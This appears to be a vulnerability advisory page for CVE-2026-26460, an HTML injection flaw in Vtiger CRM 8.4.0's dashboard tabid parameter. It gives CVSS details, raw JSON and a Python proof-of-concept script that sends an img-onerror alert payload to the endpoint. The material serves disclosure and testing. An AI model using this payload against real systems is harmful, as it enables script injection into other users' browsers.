Security Vulnerability Report
CVE-2026-26460 CVSS 6.1 MEDIUM

CVE-2026-26460

Published: 2026-04-13 21:16:24
Last Modified: 2026-04-17 15:33:34

Description

An HTML injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. The injected content is rendered in the victim's browser.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Vtiger CRM 8.4.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (change to the actual target)
target = "http://localhost/vtigercrm/"

# Vulnerable endpoint
url = target + "index.php"

# Payload: inject an image tag to test for HTML injection
payload = "<img src=x onerror=alert('CVE-2026-26460')>"

# Request parameters; the payload is placed in the unneutralized tabid parameter
params = {
    "module": "Dashboard",
    "view": "DashBoardTab",
    "action": "getTabContents",
    "tabid": payload,
}

try:
    response = requests.get(url, params=params, timeout=5)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check the browser response for the injected HTML.")
        print(f"[+] Payload URL: {response.url}")
    else:
        print("[-] Request failed.")
except Exception as e:
    print(f"[-] Error: {e}")

References

https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/
https://www.vtiger.com/open-source-crm/

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-26460",
    "sourceIdentifier": "[email protected]",
    "published": "2026-04-13T21:16:24.020",
    "lastModified": "2026-04-17T15:33:34.050",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "A HTML Injection vulnerability exists in the Dashboard module of Vtiger CRM 8.4.0. The application fails to properly neutralize user-supplied input in the tabid parameter of the DashBoardTab view (getTabContents action), allowing an attacker to inject arbitrary HTML content into the dashboard interface. The injected content is rendered in the victim's browser"
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-80"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.simonjuguna.com/cve-2026-26460-html-injection-vulnerability-in-vtiger-open-source-edition-v8-4-0/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.vtiger.com/open-source-crm/",
        "source": "[email protected]"
      }
    ]
  }
}